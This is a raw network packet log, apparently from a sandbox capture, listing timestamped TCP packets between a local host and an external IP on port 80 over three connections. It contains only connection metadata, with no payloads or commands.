Dec 19, 2024 08:52:39.111093998 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.112173080 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.112219095 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.112309933 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.113178015 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.113243103 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.113339901 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.114231110 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.114336014 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.114382982 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.115329027 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.115417957 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.115458965 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.116414070 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.116642952 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.116688013 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.117566109 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.117669106 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.117742062 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.118652105 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.118809938 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.118855953 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.119659901 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.119808912 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.120052099 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.120839119 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.120893955 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.121931076 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.122029066 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.122075081 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.123065948 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.123238087 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.123281002 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.124125957 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.124367952 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.125195026 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.125236034 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.125355005 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.126269102 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.126308918 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.126396894 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.127330065 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.127376080 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.127475977 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.127989054 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.128748894 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.128762007 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.128796101 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.129476070 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.129676104 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.129712105 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.130676031 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.130688906 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.130723953 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.131678104 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.131817102 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.131855965 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.132785082 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.132925987 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.133152008 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.133846045 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.133991957 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.134044886 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.135062933 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.135143995 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.135344028 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.136033058 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.136137962 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.136177063 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.137118101 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.137293100 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.137347937 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.138215065 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.138433933 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.138473988 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.139272928 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.139496088 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.139573097 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.140393019 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.140564919 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.140635967 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.141470909 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.141700029 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.141751051 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.142091990 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.142553091 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.142760038 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.142936945 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.143666029 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.143964052 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.144083977 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.144768000 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.144886971 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.145006895 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.145797014 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.145977020 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.146033049 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.146903038 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.147033930 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.147089005 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.147989035 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.148128986 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.148169994 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.149075985 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.149379969 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.149555922 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.150180101 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.150298119 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.150336027 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.151262045 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.151478052 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.151614904 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.152371883 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.152493000 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.152585983 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.153480053 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.153664112 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.153709888 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.154715061 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.154777050 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.154961109 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.155668020 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.155879021 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.155926943 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.156728029 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.156876087 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.156923056 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.157820940 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.157952070 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.158004999 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.158749104 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.158854961 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.158951044 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.159125090 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.159132957 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.159185886 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.159661055 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.159740925 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.159903049 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.159970999 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.160224915 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.160260916 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.160463095 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.160666943 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.160717010 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.161098003 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.161190033 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.161236048 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.161624908 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.161935091 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.162045002 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.162087917 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.162292957 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.162669897 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.162712097 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.163044930 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.163091898 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.163142920 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.163367033 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.163378954 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.163417101 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.164300919 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.164314032 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.164390087 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.164490938 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.164503098 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.164547920 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.165334940 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.165371895 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.165458918 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.165611029 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.165622950 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.165823936 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.166395903 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.166502953 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.166523933 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.166753054 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.166764021 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.166800022 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.167485952 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.167623043 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.167634010 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.167661905 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.168065071 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.168124914 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.168577909 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.168648958 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.168726921 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.168739080 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.169159889 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.169328928 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.169872046 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.169981003 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.169996977 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.170010090 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.170653105 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.170814037 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.170850992 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.170892954 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.170955896 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.170969009 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.171377897 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.171416044 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.171988964 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.172029972 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.172159910 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.172172070 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.172501087 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.172673941 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.173115015 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.173162937 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.173182964 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.173194885 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.173692942 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.173743010 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.174143076 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.174257994 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.174271107 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.174345016 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.174436092 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.174690962 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.175256014 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.175369978 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.175381899 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.175498962 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.175795078 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.175808907 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.176343918 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.176517963 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.176536083 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.176563025 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.176587105 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.176959991 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.177469969 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.177550077 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.177561998 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.177716970 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.177812099 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.177999973 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.178500891 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.178653002 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.178693056 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.178845882 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.178857088 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.178916931 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.179708004 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.179999113 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.180011034 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.180022955 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.180043936 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.180073023 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.180684090 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.180846930 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.180895090 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.181075096 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.181119919 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.181154966 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.181880951 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.182061911 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.182112932 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.182147980 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.182161093 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.182194948 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.182923079 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.182993889 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.183042049 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.183240891 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.183281898 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.183509111 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.184015036 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.184070110 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.184115887 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.184292078 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.184382915 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.184505939 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.185084105 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.185170889 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.185211897 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.185403109 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.185648918 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.185698032 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.186208010 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.186306953 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.186357021 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.186533928 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.186589956 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.186738968 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.187272072 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.187316895 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.187355995 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.187581062 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.187684059 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.187805891 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.188325882 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.188458920 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.188699007 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.188738108 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.188764095 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.189230919 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.189513922 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.189526081 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.189584017 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.189918995 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.189976931 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.190011024 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.190573931 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.190648079 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.190686941 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.190891027 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.190937996 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.191054106 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.191572905 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.191688061 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.192070961 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.192090988 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.192120075 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.192167997 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.192182064 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.192573071 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.192626953 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.192826033 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.192838907 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.192883968 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.193269014 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.193279982 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.193331003 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.193720102 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.193732977 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.193773985 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.194158077 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.194169998 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.194180965 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.194210052 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.194837093 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.194880009 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.195072889 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.195086002 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.195127964 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.195483923 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.195496082 CET	80	49732	147.45.47.15	192.168.2.4
